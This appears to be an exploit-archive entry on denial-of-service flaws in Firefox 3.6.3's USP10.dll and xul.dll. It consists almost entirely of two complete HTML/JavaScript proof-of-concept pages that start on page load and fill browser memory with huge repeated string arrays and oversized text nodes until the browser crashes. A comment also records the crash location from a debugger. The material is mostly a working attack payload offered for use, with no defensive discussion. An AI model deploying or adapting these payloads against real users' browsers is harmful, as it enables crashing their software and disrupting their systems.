Mozilla Firefox 3.6.3 USP10.dll和xul.dll库多个拒绝服务漏洞

[PoC #1 - firefox_3.6.3_dos_poc_1.htm] <HTML> <HEAD> <SCRIPT LANGUAGE="javascript"> function append_text_into_body() { var p1 = document.getElementById('p1'); var Text1 = ""; var TextNode = null; // Trigger! MakeFont... into p element on body element. for(var i = 0; i < 0x700000 / 4; i++) { Text1 = Text1 + "AAAA"; } TextNode = document.createTextNode(Text1); p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make Texts it caused an crash. } var arr1, arr2, arr3, arr4, arr5; var a = 1; var timer; function fill_all_memory() { var chunk = unescape("%u4141%u4141"); var i = 0; if( a > 5 ) { a++; } if(a >= 30) { append_text_into_body(); } while(chunk.length <= 0x400000) { chunk = chunk + chunk; } chunk = chunk + chunk + chunk; chunk = chunk.substring(0, chunk.length); if(a == 1) { arr1 = new Array(); for(i = 0; i < 0xd0; i++) { arr1[i] = chunk; } a = 2; } else if(a == 2) { arr2 = new Array(); for(i = 0; i < 0xd0; i++) { arr2[i] = chunk; } a = 3; } else if(a == 3) { arr3 = new Array(); for(i = 0; i < 0xd0; i++) { arr3[i] = chunk; } a = 4; } else if(a == 4) { arr4 = new Array(); for(i = 0; i < 0xd0; i++) { arr4[i] = chunk; } a = 5; } else if(a == 5) { arr5 = new Array(); for(i = 0; i < 0xd0; i++) { arr5[i] = chunk; } a = 6; } } function try_fill() { fill_all_memory(); setTimeout("try_fill();", 500); } </SCRIPT> </HEAD> <BODY onload="try_fill();"> <P id='p1'></P> </BODY> </HTML> [PoC #2 - firefox_3.6.3_dos_poc_2.htm] -- <HTML> <HEAD> <SCRIPT LANGUAGE="javascript"> function append_text_into_body() { var p1 = document.getElementById('p1'); var Text1 = ""; var TextNode = null; // Trigger! MakeFont... into p element on body element. for(var i = 0; i < 0x700000 / 4; i++) { Text1 = Text1 + "AAAA"; } TextNode = document.createTextNode(Text1); p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make Texts it caused an crash. } var a = 1; var timer; function fill_all_memory() // This function's variation can makes an null pointer deref without append_text_into_body() calling. { var chunk = unescape("%u4141%u4242"); var i = 0; append_text_into_body(); while(chunk.length <= 0x400000) { chunk = chunk + chunk; } chunk = chunk + chunk + chunk; chunk = chunk.substring(0, chunk.length); } function try_fill() { fill_all_memory(); // this poc makes 99% almost crashed same location as below. // 10: USP10!DoubleWideCharMappedString::operator[]+0x1f: // 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2] ds:0023:00133000=???? // 100: '' // 150: '' // 200: '' // 300: '' // 500: '' // 1000: '' // 5000: '' setTimeout("try_fill();", 10); } </SCRIPT> </HEAD> <BODY onload="try_fill();"> <P id='p1'></P> </BODY> </HTML>